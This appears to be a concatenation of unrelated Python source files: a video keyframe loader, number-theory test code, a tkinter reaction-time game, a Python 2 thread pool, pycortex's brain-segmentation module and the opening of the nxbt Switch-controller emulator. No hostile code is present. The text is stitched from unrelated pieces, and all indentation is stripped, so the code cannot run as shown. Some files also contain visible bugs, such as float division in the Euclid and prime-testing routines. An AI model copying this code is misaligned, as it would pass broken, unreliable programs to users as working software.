self.log.debug('init load_video_keyframes')
self._opt_drawframes = opt_drawframes
self._frame_width = cfg.IMAGE_SIZES[opt_size_type]
self.log.debug('load: {}'.format(self._fp_video))
# self._filevideostream = FileVideoStream(self._fp_video, transform=None, queueSize=256)
# self._filevideostream.start()
self.log.debug('filevideostream started')
self._stream = cv.VideoCapture(self._fp_video)
# _stream = self._filevideostream.stream
self._frame_count = int(self._stream.get(cv.CAP_PROP_FRAME_COUNT))
self._width = int(self._stream.get(cv.CAP_PROP_FRAME_WIDTH))
self._height = int(self._stream.get(cv.CAP_PROP_FRAME_HEIGHT))
self._fps = self._stream.get(cv.CAP_PROP_FPS)
self._mspf = int(1 / self._fps * 1000) # milliseconds per frame
self.log.debug('frame_count: {}'.format(self._frame_count))
self._stream.release()
im_blank = np.zeros([720, 1280, 3],dtype=np.uint8)
for i in range(self._frame_count):
self._keyframes[i] = im_blank.copy()
self._drawframes[i] = im_blank.copy()
self.log.debug('start load thread')
# make threaded
self.load_thread = Thread(target=self.update_thread, args=())
self.load_thread.daemon = True
self.log.debug('really start load thread')
try:
self.load_thread.start()
except Exception as ex:
self.error('{}'.format(ex))
def update_thread(self):
self._stream = cv.VideoCapture(self._fp_video)
valid, frame = self._stream.read()
self.log.debug('size: {}'.format(frame.shape))
self.log.debug('init update_thread')
frame_idx = 0
while True:
valid, frame = self._stream.read()
if not valid:
self._stream.release()
break
frame = im_utils.resize(frame, width=self._frame_width)
self._keyframes[frame_idx] = frame
if self._opt_drawframes:
self._drawframes[frame_idx] = frame.copy() # make drawable copy
frame_idx += 1
@property
def last_display_ms(self):
return self._last_display_ms
@last_display_ms.setter
def last_display_ms(self, value):
self._last_display_ms = value
@property
def mspf(self):
return self._mspf
@property
def width(self):
return self._width
@property
def height(self):
return self._height
@property
def fps(self):
return self._fps
@property
def frame_count(self):
return self._frame_count
@property
def filevideostream(self):
return self._filevideostream
@property
def drawframe(self):
return self._drawframe
class MediaRecordChairItem(ChairItem):
chair_type = types.ChairItemType.MEDIA_RECORD
def __init__(self, ctx, media_record):
super().__init__(ctx)
self._media_record = media_record
self._sha256 = self._media_record.sha256
def load_images(self, dir_media, opt_size, opt_density, opt_drawframes=False):
sha256_tree = file_utils.sha256_tree(self._sha256)
dir_sha256 = join(dir_media, sha256_tree, self._sha256)
opt_size_label = cfg.IMAGE_SIZE_LABELS[opt_size]
# get the keyframe status data to check if images available
try:
keyframe_status = self.get_metadata(types.Metadata.KEYFRAME_STATUS)
except Exception as ex:
self.log.error('no keyframe metadata. Try: "append -t keyframe_status"')
return
keyframes = {}
# if keyframe images were generated and exist locally
if keyframe_status and keyframe_status.get_status(opt_size):
keyframe_metadata = self.get_metadata(types.Metadata.KEYFRAME)
if not keyframe_metadata:
self.log.error('no keyframe metadata. Try: "append -t keyframe"')
return
# get keyframe indices
frame_idxs = keyframe_metadata.get_keyframes(opt_density)
for frame_idx in frame_idxs:
# get keyframe filepath
fp_keyframe = join(dir_sha256, file_utils.zpad(frame_idx), opt_size_label, 'index.jpg')
try:
im = cv.imread(fp_keyframe)
im.shape # used to invoke error if file didn't load correctly
except:
self.log.warn('file not found: {}'.format(fp_keyframe))
# don't add to keyframe dict
continue
keyframes[frame_idx] = im
# append metadata to chair_item's mapping item
self.set_keyframes(keyframes, opt_drawframes)
@property
def sha256(self):
return self._sha256
@property
def verified(self):
return self._media_record.verified
@property
def media_record(self):
"""both refer to same data"""
return self._media_record
|
tests.py
|
import random
import multiprocessing
import time
def main1():
x = 14
y = 18
z = []
z = ExtendedEuclid(x,y,z)
if(z[0]):
print('{}和{}互素,乘法的逆元是:{}\n'.format(x, y, z[1]))
else:
print('{}和{}不互素,最大公约数为:{}\n'.format(x, y, z[1]))
return 0
def ExtendedEuclid(f, d , result):
# x1,x2,x3,y1,y2,y3,t1,t2,t3,q
x1 = 1
y2 = 1
x2 = 0
y1 = 0
if(f >= d):
x3 = f
y3 = d
else:
x3 = d
y3 = f
while True:
if ( y3 == 0 ):
result = x3 # 两个数不互素则result为两个数的最大公约数,此时返回值为零
return 0, result
if ( y3 == 1 ):
result = y2 # 两个数互素则result为其乘法逆元,此时返回值为1
return 1, result
q = x3 / y3
t1 = x1 - q * y1
t2 = x2 - q * y2
t3 = x3 - q*y3
x1 = y1
x2 = y2
x3 = y3
y1 = t1
y2 = t2
y3 = t3
def egcd(a, b):
if b == 0:
return a, 1, 0
else:
g, x, y = egcd(b, a % b)
return g, y, x - a / b * y
def modPow(a, b, m):
v = 1
p = a % m
b = int(b)
while(b > 0):
if (b & 1) != 0:
v = (v * p) % m
p = (p * p) % m
b >>= 1
return v
def witness(a, n):
n1 = n - 1
s2 = n1 & -n1
x = modPow(a, n1 / s2, n)
if x == 1 or x == n1:
return False
while (s2 > 1):
x = (x * x) % n
if x == 1:
return True
if x == n1:
return False
s2 >>= 1
return True
def probably_prime(n, k):
if n == 2 or n == 3:
return True
if n < 2 or n % 2 == 0:
return False
for i in range(k):
if witness(random.randint(1, n - 3) + 2, n):
return False
return True
def aaa():
if probably_prime(607, 1):
print('YES')
else:
print('NO')
def output_number(number):
while True:
print(number)
time.sleep(1)
if __name__ == '__main__':
# main1()
#
# a = 7
# b = 48
# print(egcd(a, b))
t1 = multiprocessing.Process(target=output_number, args=(1,))
t2 = multiprocessing.Process(target=output_number, args=(2,))
t1.start()
t2.start()
|
test.py
|
#importing modules, all preinstalled normally
from threading import Thread
from tkinter import *
from random import randint
from time import sleep, time
"""
██████╗ ███████╗ █████╗ ██████╗████████╗██╗ ██████╗ ███╗ ██╗ ████████╗███████╗███████╗████████╗
██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝██║██╔═══██╗████╗ ██║ ╚══██╔══╝██╔════╝██╔════╝╚══██╔══╝
██████╔╝█████╗ ███████║██║ ██║ ██║██║ ██║██╔██╗ ██║█████╗██║ █████╗ ███████╗ ██║
██╔══██╗██╔══╝ ██╔══██║██║ ██║ ██║██║ ██║██║╚██╗██║╚════╝██║ ██╔══╝ ╚════██║ ██║
██║ ██║███████╗██║ ██║╚██████╗ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗███████║ ██║
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚══════╝ ╚═╝
"""
print('Credits to https://github.com/xtekky')
#defining a class
class Reactiontest:
#setting up GUI
def __init__(self):
self.window = Tk()
self.window.geometry('1031x580') #window dimasion
self.window.title("Reaciton Time Test - Credits to Github xtekky") #window title
self.window.config(bg='#2b353f')
self.scores = []
self.react_ready = False
self.start_time = None
self.valid_round = True
self.round = 0
# setting up a startt button
self.start_button = Button(self.window, text='CLICK TO START', fg='#1E272E', bg='WHITE', font='Calibri 26 bold', bd=0, width=20, command= lambda: (self.start(), self.start_button.place_forget()))
self.start_button.place(relx=.340625, rely=.425)
# displaying GUI
self.window.mainloop()
#reset function if user clicks too early
def reset(self):
self.window.unbind("<Button-1>")
self.start_button.place(relx=.340625, rely=.425)
self.scores = []
self.round = 0
self.valid_round = True
#start function - when user presses start button
def _start(self):
sleep(randint(750, 2250) / 1000)
if self.valid_round:
self.window.config(bg='#576574')
self.start_time = time()
self.react_ready = True
def start(self):
if self.round != 1:
self.window.bind("<Button-1>", lambda event: self.register())
Thread(target=self._start).start()
else:
self.end()
# register function
def register(self):
if self.react_ready:
self.scores.append(time() - self.start_time)
self.window.config(bg='#1E272E')
self.react_ready = False
self.round += 1
self.start()
else:
self.valid_round = False
self.early()
# function if user clicks too early
def _early(self):
self.window.config(bg='#1E272E')
warning = Label(self.window, text="!", bg='white', fg='#1E272E', font='Calibri 60 bold', width=2)
warning.place(relx=.27, rely=.4)
early = Label(self.window, text="You clicked too early!\nRestarting in 1 second...", justify=LEFT, bg='#1E272E', fg='WHITE', font='Calibri 30 bold')
early.place(relx=.37, rely=.4)
sleep(1)
warning.place_forget()
early.place_forget()
self.reset()
def early(self):
Thread(target=self._early).start()\
#function to replay test when finished
def end(self):
score_items = []
score_avg = Label(self.window, text=" ".join(f'REACTION TIME: {int((sum(self.scores) / 1) * 1000)}ms'), bg='#1E272E', fg='WHITE', font='Calibri 24 bold')
score_avg.place(relx=.25, rely=.35)
restart = Button(self.window, text="▶", bg='#1E272E', fg='WHITE', font='Calibri 30', height=1, bd=0, command=lambda: ([item.place_forget() for item in score_items], self.reset()))
restart.place(relx=.691, rely=.32)
score_items.extend((score_avg, restart))
self.window.unbind("<Button-1>")
#starting script
if __name__ == '__main__':
Reactiontest()
|
threads.py
|
from threading import *
import time
import atexit
class Threader(object):
def __init__(self, threads, onSucess=None, onError=None, actions=[]):
self.waitForWork = False
self.threads = []
self.threadCount = threads
self.work = actions
self.errors = None
self.onSucess = onSucess
self.onError = onError
self.qlock = Lock()
self.xlock = Lock()
self.elock = Lock()
self.isKilled = False
def add(self,action):
with self.qlock:
self.work.append(action)
def start(self, waitForWork=False):
self.waitForWork = waitForWork
for tc in range(self.threadCount):
t = Thread(target=self._getWork)
t.start()
self.threads.append(t)
if not waitForWork:
self._join()
def finish(self):
self.waitForWork = False
self._join()
def kill(self):
self.work = []
self.isKilled = True
def _join(self):
for t in self.threads:
t.join()
def _nextWorkItem(self):
with self.qlock:
if len(self.work) > 0:
return self.work.pop(0)
if self.waitForWork:
time.sleep(.2)
return self._nextWorkItem()
return False
def _getWork(self):
w = self._nextWorkItem()
while w:
self._doWork(w)
w = self._nextWorkItem()
def _doWork(self,w):
try:
r = None
if isinstance(w,tuple):
r = w[0](**w[1])
else:
r = w()
if self.onSucess:
with self.xlock:
if not self.isKilled:
self.onSucess(r)
except Exception, e:
if self.onError:
with self.elock:
self.onError(e)
if not self.errors:
self.errors = []
self.errors.append(str(e))
|
segment.py
|
"""Controls functions for segmentation of white/gray matter and other things in the brain.
"""
import os
import time
import shlex
import warnings
import numpy as np
import subprocess as sp
from builtins import input
import multiprocessing as mp
from . import formats
from . import blender
from . import freesurfer
from . import options
from .database import db
from .freesurfer import autorecon as run_freesurfer_recon
from .freesurfer import import_subj as import_freesurfer_subject
slim_path = options.config.get('dependency_paths', 'slim')
def init_subject(subject, filenames, do_import_subject=False, **kwargs):
"""Run the first initial segmentation for a subject's anatomy (in Freesurfer).
This function creates a Freesurfer subject and runs autorecon-all,
then (optionally) imports the subject into the pycortex database.
NOTE: This function requires a functional Freesurfer install!
Also, still can't handle T2 weighted anatomical volume input. Please use
Freesurfer directly (and then import) for advanced recon-all input
options; this is just a convenience function.
Parameters
----------
subject : str
The name of the subject (this subject is created in the Freesurfer
SUBJECTS_DIR)
filenames : str or list
Freesurfer-compatible filename(s) for the anatomical image(s). This can
be the first dicom file of a series of dicoms, a nifti file, an mgz
file, etc.
do_import_subject : bool
Whether to import the Freesurfer-processed subject (without further)
editing) into pycortex. False by default, since we recommend editing
(or at least inspecting) the brain mask and white matter segmentations
prior to importing into pycortex.
kwargs : keyword arguments passed to cortex.freesurfer.autorecon()
useful ones: parallel=True, n_cores=4 (or more, if you have them)
"""
if 'run_all' in kwargs:
warnings.warn('`run_all` is deprecated - please use do_import_subject keyword arg instead!')
do_import_subject = kwargs.pop('run_all')
if not isinstance(filenames, (list, tuple)):
filenames = [filenames]
filenames = ' '.join(['-i %s'%f for f in filenames])
cmd = "recon-all {fname} -s {subj}".format(subj=subject, fname=filenames)
print("Calling:\n%{}".format(cmd))
sp.call(shlex.split(cmd))
run_freesurfer_recon(subject, "all", **kwargs)
if do_import_subject:
import_freesurfer_subject(subject)
def edit_segmentation(subject,
volumes=('aseg.mgz', 'brainmask.mgz', 'wm.mgz'),
surfaces=('lh.smoothwm', 'rh.smoothwm', 'lh.pial', 'rh.pial'),
freesurfer_subject_dir=None):
"""Edit automatic segmentation results using freeview
Opens an instance of freeview with relevant files loaded.
Parameters
----------
subject : str
freesurfer subject identifier. Note that subject must be in your
SUBJECTS_DIR for freesurfer. If the environment variable SUBJECTS_DIR
is not set in your shell, then the location of the directory must be
specified in `freesurfer_subject_dir`.
volumes : tuple | list
Names of volumes to load in freeview
surfaces : tuple | list
Names of surfaces to load in freeview
freesurfer_subject_dir : str | None
Location of freesurfer subjects directory. If None, defaults to value
of SUBJECTS_DIR environment variable.
"""
if freesurfer_subject_dir is None:
freesurfer_subject_dir = os.environ['SUBJECTS_DIR']
cmaps = {'brain': 'grayscale',
'aseg': 'lut',
'brainmask': 'gray',
'wm': 'heat',
'smoothwm': 'yellow',
'white': 'green',
'pial': 'blue'
}
opacity={'brain': 1.0,
'aseg': 0.4,
'brainmask': 1.0,
'wm': 0.4,
}
vols = []
for v in volumes:
vpath = os.path.join(freesurfer_subject_dir, subject, 'mri', v)
vv, _ = os.path.splitext(v)
vextra = ':colormap={cm}:opacity={op:0.2f}'.format(cm=cmaps[vv], op=opacity[vv])
vols.append(vpath + vextra)
surfs = []
for s in surfaces:
spath = os.path.join(freesurfer_subject_dir, subject, 'surf', s)
_, ss = s.split('.')
sextra = ':edgecolor={col}'.format(col=cmaps[ss])
surfs.append(spath + sextra)
cmd = ["freeview", '-v'] + vols + ['-f'] + surfs
print("Calling: {}".format(' '.join(cmd)))
sp.call(cmd)
print("If you have edited the white matter surface, you should run:\n")
print(" `cortex.segment.run_freesurfer_recon('%s', 'wm')`\n"%subject)
print("If you have edited the brainmask (pial surface), you should run:\n")
print(" `cortex.segment.run_freesurfer_recon('%s', 'pia')`"%subject)
def cut_surface(cx_subject, hemi, name='flatten', fs_subject=None, data=None,
freesurfer_subject_dir=None, flatten_with='freesurfer',
do_import_subject=True, **kwargs):
"""Initializes an interface to cut the segmented surface for flatmapping.
This function creates or opens a blend file in your filestore which allows
surfaces to be cut along hand-defined seams. Blender will automatically
open the file. After edits are made, remember to save the file, then exit
Blender.
The surface will be automatically extracted from blender then run through
the mris_flatten command in freesurfer. The flatmap will be imported once
that command finishes if `do_import_subject` is True (default value).
Parameters
----------
cx_subject : str
Name of the subject to edit (pycortex subject ID)
hemi : str
Which hemisphere to flatten. Should be "lh" or "rh"
name : str, optional
String name of the current flatten attempt. Defaults to "flatten"
data : Dataview
A data view object to display on the surface as a cutting guide.
fs_subject : str
Name of Freesurfer subject (if different from pycortex subject)
None defaults to `cx_subject`
freesurfer_subject_dir : str
Name of Freesurfer subject directory. None defaults to SUBJECTS_DIR
environment varible
flatten_with : str
'freesurfer' or 'SLIM' - 'freesurfer' (default) uses freesurfer's
`mris_flatten` function to flatten the cut surface. 'SLIM' uses
the SLIM algorithm, which takes much less time but tends to leave
more distortions in the flatmap. SLIM is an optional dependency, and
must be installed to work; clone the code
(https://github.com/MichaelRabinovich/Scalable-Locally-Injective-Mappings)
to your computer and set the slim dependency path in your pycortex config
file to point to </path/to/your/slim/install>/ReweightedARAP
do_import_subject : bool
set option to automatically import flatmaps when both are completed
(if set to false, you must import later with `cortex.freesurfer.import_flat()`)
"""
if fs_subject is None:
fs_subject = cx_subject
opts = "[hemi=%s,name=%s]"%(hemi, name)
fname = db.get_paths(cx_subject)['anats'].format(type='cutsurf', opts=opts, ext='blend')
# Double-check that fiducial and inflated vertex counts match
# (these may not match if a subject is initially imported from freesurfer to pycortex,
# and then edited further for a better segmentation and not re-imported)
ipt, ipoly, inrm = freesurfer.get_surf(fs_subject, hemi, 'inflated')
fpt, fpoly, fnrm = freesurfer.get_surf(fs_subject, hemi, 'fiducial')
if ipt.shape[0] != fpt.shape[0]:
raise ValueError("Please re-import subject - fiducial and inflated vertex counts don't match!")
else:
print('Vert check ok!')
if not os.path.exists(fname):
blender.fs_cut(fname, fs_subject, hemi, freesurfer_subject_dir)
# Add localizer data to facilitate cutting
if data is not None:
blender.add_cutdata(fname, data, name=data.description)
blender_cmd = options.config.get('dependency_paths', 'blender')
sp.call([blender_cmd, fname])
patchpath = freesurfer.get_paths(fs_subject, hemi,
freesurfer_subject_dir=freesurfer_subject_dir)
patchpath = patchpath.format(name=name)
blender.write_patch(fname, patchpath)
if flatten_with == 'freesurfer':
done = freesurfer.flatten(fs_subject, hemi, patch=name,
freesurfer_subject_dir=freesurfer_subject_dir,
**kwargs)
if not done:
# If flattening is aborted, skip the rest of this function
# (Do not attempt to import completed flatmaps)
return
if do_import_subject:
# Check to see if both hemispheres have been flattened
other = freesurfer.get_paths(fs_subject, "lh" if hemi == "rh" else "rh",
freesurfer_subject_dir=freesurfer_subject_dir)
other = other.format(name=name+".flat")
# If so, go ahead and import subject
if os.path.exists(other):
freesurfer.import_flat(fs_subject, name, sname=cx_subject,
flat_type='freesurfer',
freesurfer_subject_dir=freesurfer_subject_dir)
elif flatten_with == 'SLIM':
done = flatten_slim(fs_subject, hemi, patch=name,
freesurfer_subject_dir=freesurfer_subject_dir,
**kwargs)
if not done:
# If flattening is aborted, skip the rest of this function
# (Do not attempt to import completed flatmaps)
return
if do_import_subject:
other = freesurfer.get_paths(fs_subject, "lh" if hemi == "rh" else "rh",
type='slim',
freesurfer_subject_dir=freesurfer_subject_dir)
other = other.format(name=name)
# If so, go ahead and import subject
if os.path.exists(other):
freesurfer.import_flat(fs_subject, name, sname=cx_subject,
flat_type='slim',
freesurfer_subject_dir=freesurfer_subject_dir)
return
def flatten_slim(subject, hemi, patch, n_iterations=20, freesurfer_subject_dir=None,
slim_path=slim_path, do_flatten=None):
"""Flatten brain w/ slim object flattening
Parameters
----------
subject : str
freesurfer subject
hemi : str
'lh' or 'rh' for left or right hemisphere
patch : str
name of patch, often "flatten" (obj file used here is {hemi}_{patch}.obj
in the subject's freesurfer directory)
freesurfer_subject_dir : str
path to freesurfer subejct dir. Defaults to environment variable
SUBJECTS_DIR
slim_path : str
path to SLIM flattening. Defaults to path specified in config file.
"""
if slim_path == 'None':
slim_url = 'https://github.com/MichaelRabinovich/Scalable-Locally-Injective-Mappings'
raise ValueError("Please download SLIM ({slim_url}) and set the path to it in the `slim` field\n"
"in the `[dependency_paths]` section of your config file ({usercfg}) \n"
"if you wish to use slim!".format(slim_url=slim_url, usercfg=options.usercfg))
if do_flatten is None:
resp = input('Flattening with SLIM will take a few mins. Continue? (type y or n and press return)')
do_flatten = resp.lower() in ('y', 'yes')
if not do_flatten:
print("Not flattening...")
return
# File paths
if freesurfer_subject_dir is None:
freesurfer_subject_dir = os.environ['SUBJECTS_DIR']
patchpath = freesurfer.get_paths(subject, hemi,
freesurfer_subject_dir=freesurfer_subject_dir)
patchpath = patchpath.format(name=patch)
obj_in = patchpath.replace('.patch.3d', '.obj')
obj_out = obj_in.replace('.obj', '_slim.obj')
# Load freesurfer surface exported from blender
pts, polys, _ = freesurfer.get_surf(subject, hemi, "patch", patch=patch, freesurfer_subject_dir=freesurfer_subject_dir)
# Cull pts that are not in manifold
pi = np.arange(len(pts))
pii = np.in1d(pi, polys.flatten())
idx = np.nonzero(pii)[0]
pts_new = pts[idx]
# Match indices in polys to new index for pts
polys_new = np.vstack([np.searchsorted(idx, p) for p in polys.T]).T
# save out obj file
print("Writing input to SLIM: %s"%obj_in)
formats.write_obj(obj_in, pts_new, polys_new)
# Call slim to write new obj file
print('Flattening with SLIM (will take a few minutes)...')
slim_cmd = [slim_path, obj_in, obj_out, str(n_iterations)]
print('Calling: {}'.format(' '.join(slim_cmd)))
out = sp.check_output(slim_cmd)
print("SLIM code wrote %s"%obj_out)
# Load resulting obj file
_, _, _, uv = formats.read_obj(obj_out, uv=True)
uv = np.array(uv)
# Re-center UV & scale to match scale of inflated brain. It is necessary
# to re-scale the uv coordinates generated by SLIM, since they have
# arbitrary units that don't match the scale of the inflated /
# fiducial brains.
uv -= uv.min(0)
uv /= uv.max()
uv -= (uv.max(0) / 2)
infl_scale = np.max(np.abs(pts_new.min(0)-pts_new.max(0)))
# This is a magic number based on the approximate scale of the flatmap
# (created by freesurfer) to the inflated map in a couple other subjects.
# For two hemispheres in two other subjects, it ranged from 1.37 to 1.5.
# There doesn't seem to be a principled way to set this number, since the
# flatmap is stretched and distorted anyway, and that stretch varies by
# subject and by hemisphere. Note, tho,that this doesn't change
# distortions, just the overall scale of the thing. So here we are.
# ML 2018.07.05
extra_scale = 1.4
uv *= (infl_scale * extra_scale)
# put back polys, etc that were missing
pts_flat = pts.copy()
pts_flat[idx, :2] = uv
# Set z coords for the manifold vertices to 0
pts_flat[idx, 2] = 0
# Re-set scale for non-manifold vertices
nz = pts_flat[:, 2] != 0
pts_flat[nz, 2] -= np.mean(pts_flat[nz, 2])
# Flip X axis for right hem (necessary?)
if hemi=='rh':
# Flip Y axis upside down
pts_flat[:, 1] = -pts_flat[:, 1]
pts_flat[:, 0] = -pts_flat[:, 0]
# Modify output .obj file to reflect flattening
#surfpath = os.path.join(freesurfer_subject_dir, subject, "surf", "flat_{hemi}.gii")
#fname = surfpath.format(hemi=hemi)
#print("Writing %s"%fname)
formats.write_obj(obj_out.replace('_slim','.flat_slim'), pts=pts_flat, polys=polys)
return
def show_surface(subject, hemi, surface_type, patch=None, flatten_step=None, freesurfer_subject_dir=None):
"""
Parameters
----------
subject: str
freesurfer subject name
hemi: str
'lh' or 'rh' for left hemisphere or right hemisphere
surface_type : str
type of surface to show, e.g. 'patch', 'surf', etc if 'patch',
patch name must be specified in patch kwarg
patch: str
name of patch, e.g. 'flatten.flat', 'flatten2.flat', etc
"""
meshlab_path = options.config.get('dependency_paths', 'meshlab')
if meshlab_path == 'None':
try:
# exists in system but not available in config
meshlab_path = sp.check_output('command -v meshlab', shell=True).strip()
warnings.warn('Using system meshlab: %s'%meshlab_path)
except sp.CalledProcessError:
raise ValueError('You must have installed meshlab to call this function.')
if freesurfer_subject_dir is None:
freesurfer_subject_dir = os.environ['SUBJECTS_DIR']
if surface_type in ('inflated', 'fiducial'):
input_type = 'surf'
else:
input_type = surface_type
fpath = freesurfer.get_paths(subject, hemi, input_type,
freesurfer_subject_dir=freesurfer_subject_dir)
if not 'obj' in fpath:
pts, polys, curv = freesurfer.get_surf(subject, hemi, surface_type,
patch=patch,
flatten_step=flatten_step,
freesurfer_subject_dir=freesurfer_subject_dir)
# TODO: use tempfile library here
objf = '/tmp/temp_surf.obj'
formats.write_obj(objf, pts, polys)
else:
objf = fpath.format(name=patch)
# Call meshlab to display surface
out = sp.check_output([meshlab_path, objf])
### DEPRECATED ###
def fix_wm(subject):
"""Initializes an interface to make white matter edits to the surface.
This will open two windows -- a tkmedit window that makes the actual edits,
as well as a mayavi window to display the surface. Clicking on the mayavi window
will drop markers which can be loaded using the "Goto Save Point" button in tkmedit.
If you wish to load the other hemisphere, simply close the mayavi window and the
other hemisphere will pop up. Mayavi will stop popping up once the tkmedit window
is closed.
Once the tkmedit window is closed, a variety of autorecon options are available.
When autorecon finishes, the new surfaces are immediately imported into the pycortex
database.
Parameters
----------
subject : str
Name of the subject to edit
"""
warnings.warn("Deprecated! We recommend using edit_segmentation() and rerun_recon() instead of fix_wm() and fix_pia().")
status = _cycle_surf(subject, "smoothwm")
cmd = "tkmedit {subj} wm.mgz lh.smoothwm -aux brainmask.mgz -aux-surface rh.smoothwm"
sp.call(shlex.split(cmd.format(subj=subject)))
status.value = 0
resp = input("1) Run autorecon-wm?\n2) Run autorecon-cp?\n3) Do nothing?\n (Choose 1, 2, or 3)")
if resp == "1":
freesurfer.autorecon(subject, "wm")
elif resp == "2":
freesurfer.autorecon(subject, "cp")
elif resp == "3":
print("Doing nothing...")
return
import_freesurfer_subject(subject)
def fix_pia(subject):
"""Initializes an interface to make pial surface edits.
This function will open two windows -- a tkmedit window that makse the actual edits,
as well as a mayavi window to display the surface. Clicking on the mayavi window
will drop markers which can be loaded using the "Goto Save Point" button in tkmedit.
If you wish to load the other hemisphere, simply close the mayavi window and the
other hemisphere will pop up. Mayavi will stop popping up once the tkmedit window
is closed.
Once the tkmedit window is closed, a variety of autorecon options are available.
When autorecon finishes, the new surfaces are immediately imported into the pycortex
database.
Parameters
----------
subject : str
Name of the subject to edit
"""
warnings.warn("Deprecated! We recommend using edit_segmentation() and rerun_recon() instead of fix_wm() and fix_pia().")
status = _cycle_surf(subject, "pial")
cmd = "tkmedit {subj} brainmask.mgz lh.smoothwm -aux T1.mgz -aux-surface rh.smoothwm"
sp.call(shlex.split(cmd.format(subj=subject)))
status.value = 0
resp = input("1) Run autorecon-pia?\n2) Run autorecon-wm?\n3) Do nothing?\n (Choose 1, 2, or 3)")
if resp == "1":
freesurfer.autorecon(subject, "pia")
elif resp == "2":
freesurfer.autorecon(subject, "wm")
elif resp == "3":
print("Doing nothing...")
return
import_freesurfer_subject(subject)
def _cycle_surf(subject, surf):
status = mp.Value('b', 1)
def cycle_surf():
idx, hemis = 0, ['lh', 'rh']
while status.value > 0:
hemi = hemis[idx%len(hemis)]
idx += 1
#HELLISH CODE FOLLOWS, I heavily apologize for this awful code
#In order for this to work well, mayavi has to block until you close the window
#Unfortunately, with IPython's event hook, mlab.show does not block anymore
#There is no way to force mayavi to block, and hooking directly into backend vtk objects cause it to crash out
#Thus, the only safe way is to call python using subprocess
cmd = "python -m cortex.freesurfer {subj} {hemi} {surf}"
sp.call(shlex.split(cmd.format(subj=subject, hemi=hemi, surf=surf)))
proc = mp.Process(target=cycle_surf)
proc.start()
return status
|
nxbt.py
|
from multiprocessing import Process, Lock, Queue, Manager
import queue
from enum import Enum
import atexit
import signal
import os
import sys
import time
import json
import dbus
from .controller import ControllerServer
from .controller import ControllerTypes
from .bluez import BlueZ, find_objects, toggle_clean_bluez
from .bluez import replace_mac_addresses
from .bluez import find_devices_by_alias
from .bluez import SERVICE_NAME, ADAPTER_INTERFACE
from .logging import create_logger
JOYCON_L = ControllerTypes.JOYCON_L
JOYCON_R = ControllerTypes.JOYCON_R
PRO_CONTROLLER = ControllerTypes.PRO_CONTROLLER
DIRECT_INPUT_PACKET = {
# Sticks
"L_STICK": {
"PRESSED": False,
"X_VALUE": 0,
"Y_VALUE": 0,
# Keyboard position calculation values
"LS_UP": False,
"LS_LEFT": False,
"LS_RIGHT": False,
"LS_DOWN": False
},
"R_STICK": {
"PRESSED": False,
"X_VALUE": 0,
"Y_VALUE": 0,
# Keyboard position calculation values
"RS_UP": False,
"RS_LEFT": False,
"RS_RIGHT": False,
"RS_DOWN": False
},
# Dpad
"DPAD_UP": False,
"DPAD_LEFT": False,
"DPAD_RIGHT": False,
"DPAD_DOWN": False,
# Triggers
"L": False,
"ZL": False,
"R": False,
"ZR": False,
# Joy-Con Specific Buttons
"JCL_SR": False,
"JCL_SL": False,
"JCR_SR": False,
"JCR_SL": False,
# Meta buttons
"PLUS": False,
"MINUS": False,
"HOME": False,
"CAPTURE": False,
# Buttons
"Y": False,
"X": False,
"B": False,
"A": False
}
class Buttons():
"""The button object containing the button string constants.
"""
Y = 'Y'
X = 'X'
B = 'B'
A = 'A'
JCL_SR = 'JCL_SR'
JCL_SL = 'JCL_SL'
R = 'R'
ZR = 'ZR'
MINUS = 'MINUS'
PLUS = 'PLUS'
R_STICK_PRESS = 'R_STICK_PRESS'
L_STICK_PRESS = 'L_STICK_PRESS'
HOME = 'HOME'
CAPTURE = 'CAPTURE'
DPAD_DOWN = 'DPAD_DOWN'
DPAD_UP = 'DPAD_UP'
DPAD_RIGHT = 'DPAD_RIGHT'
DPAD_LEFT = 'DPAD_LEFT'
JCR_SR = 'JCR_SR'
JCR_SL = 'JCR_SL'
L = 'L'
ZL = 'ZL'
class Sticks():
"""The sticks object containing the joystick string constants.
"""
RIGHT_STICK = "R_STICK"
LEFT_STICK = "L_STICK"
class NxbtCommands(Enum):
"""An enumeration containing the nxbt message
commands.
"""
CREATE_CONTROLLER = 0
INPUT_MACRO = 1
STOP_MACRO = 2
CLEAR_MACROS = 3
CLEAR_ALL_MACROS = 4
REMOVE_CONTROLLER = 5
QUIT = 6
class Nxbt():
"""The nxbt object implements the core multiprocessing logic
and message passing API that acts as the central of the application.
Upon creation, a multiprocessing Process is spun off to act at the
manager for all emulated Nintendo Switch controllers. Messages
are passed into a queue which is consumed and acted upon by the
_command_manager.
All function calls that interact or control the emulated controllers
are simply message constructors that submit to the central task_queue.
This allows for thread-safe control of emulated controllers.
"""
def __init__(self, debug=False, log_to_file=False, disable_logging=False):
"""Initializes the necessary multiprocessing resources and starts
the multiprocessing processes.
:param debug: Enables the debugging functionality of
nxbt, defaults to False
:type debug: bool, optional
:param log_to_file: A boolean value that indiciates whether or not
a log should be saved to the current working directory, defaults to False
:type log_to_file: bool, optional
:param disable_logging: Routes all logging calls to a null log handler.
:type disable_logging: bool, optional, defaults to False.
"""
self.debug = debug
self.logger = create_logger(
debug=self.debug, log_to_file=log_to_file, disable_logging=disable_logging)
# Main queue for nbxt tasks
self.task_queue = Queue()
# Sychronizes bluetooth actions
self._bluetooth_lock = Lock()
# Creates/manages shared resources
self.resource_manager = Manager()
# Shared dictionary for viewing overall nxbt state.
# Should treated as read-only except by
# the main nxbt multiprocessing process.
self.manager_state = self.resource_manager.dict()
self.manager_state_lock = Lock()
# Shared, controller management properties.
# The controller lock is used to sychronize use.
self._controller_lock = Lock()
self._controller_counter = 0
self._adapters_in_use = {}
self._controller_adapter_lookup = {}
# Disable the BlueZ input plugin so we can use the
# HID control/interrupt Bluetooth ports
toggle_clean_bluez(True)
# Exit handler
atexit.register(self._on_exit)
# Starting the nxbt worker process
self.controllers = Process(
target=self._command_manager,
args=((self.task_queue), (self.manager_state)))
# Disabling daemonization since we need to spawn
# other controller processes, however, this means
# we need to cleanup on exit.
self.controllers.daemon = False
self.controllers.start()
def _on_exit(self):
"""The exit handler function used with the atexit module.
This function attempts to gracefully exit by terminating
all spun up multiprocessing Processes. This is done to
ensure no zombie processes linger after exit.
"""
# Need to explicitly kill the controllers process
# since it isn't daemonized.
if hasattr(self, "controllers") and self.controllers.is_alive():
self.controllers.terminate()
